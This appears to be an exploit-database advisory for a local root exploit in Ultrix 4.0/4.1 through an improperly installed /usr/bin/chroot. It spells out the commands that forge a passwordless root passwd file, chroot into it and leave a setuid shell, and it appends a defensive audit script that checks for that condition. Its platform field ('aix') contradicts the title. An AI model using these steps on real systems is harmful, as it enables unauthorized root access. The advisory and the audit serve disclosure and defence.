Digital Ultrix 4.0/4.1 - '/usr/bin/chroot' Local Privilege Escalation
Author: anonymous
type: local
platform: aix
date_added: 1991-05-01
date_updated: 2017-11-16
verified: 1
codes: OSVDB-885;CVE-1999-1194
raw file: 19041.txt
source: https://www.securityfocus.com/bid/17/info

By default, /usr/bin/chroot is improperly installed in Ultrix versions 4.0 and 4.1. Anyone can execute /usr/bin/chroot, which can allow system users to gain unauthorized privileges.

$ mkdir /tmp/etc
$ echo root::0:0::/:/bin/sh > /tmp/etc/passwd
$ mkdir /tmp/bin
$ cp /bin/sh /tmp/bin/sh
$ cp /bin/chmod /tmp/bin/chmod
$ chroot /tmp /bin/login

Then log in as root with no password. chmod /tmp/bin/sh to 4700, exit, and run the suid /tmp/bin/sh.
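
An audit check for the condition described above, added here as an example and not part of the original advisory. It assumes "improperly installed" means the binary carries the setuid bit while being executable by users other than its owner; the function names are hypothetical.

```shell
#!/bin/sh
# Added audit example, not from the original advisory.
# Assumption: the unsafe install state is "setuid bit set AND executable
# by group or other", which is what lets any user reach chroot(2).

# is_exposed PATH
# Succeeds (exit 0) if PATH is a regular file with the setuid bit set
# that group or other may execute. -H follows a symlink given on the
# command line so a linked binary is still examined.
is_exposed() {
    [ -f "$1" ] || return 1
    [ -n "$(find -H "$1" -type f -perm -4000 \
            \( -perm -0010 -o -perm -0001 \) -print 2>/dev/null)" ]
}

# suid_files DIR
# Prints every setuid regular file below DIR, one per line. A setuid
# shell inside a scratch tree such as /tmp is the artifact left behind
# by the final step of the procedure above.
suid_files() {
    find "$1" -type f -perm -4000 -print 2>/dev/null
}

# audit BINARY SCRATCH_DIR
# Human-readable report combining both checks; returns 1 on any finding.
audit() {
    rc=0
    if is_exposed "$1"; then
        echo "EXPOSED: $1 is setuid and executable by non-owners"
        rc=1
    fi
    found=$(suid_files "$2")
    if [ -n "$found" ]; then
        echo "SUID files under $2:"
        echo "$found"
        rc=1
    fi
    return "$rc"
}

# Typical call: audit /usr/bin/chroot /tmp
```
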